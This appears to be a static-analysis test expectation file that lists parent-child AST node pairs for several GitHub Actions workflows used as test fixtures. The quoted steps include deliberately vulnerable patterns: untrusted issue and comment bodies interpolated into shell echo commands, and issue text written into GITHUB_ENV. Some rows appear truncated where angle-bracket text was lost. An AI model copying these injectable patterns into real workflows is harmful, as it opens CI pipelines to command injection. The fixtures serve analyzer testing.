| LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | -| .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | -| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | -| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | -| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | -| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:9:34:6 | Run Step | -| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:34:6 | Run Step | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:71:9:78:6 | Run Step | -| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:71:9:78:6 | Run Step | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:78:9:85:6 | Run Step | -| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:78:9:85:6 | Run Step | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | 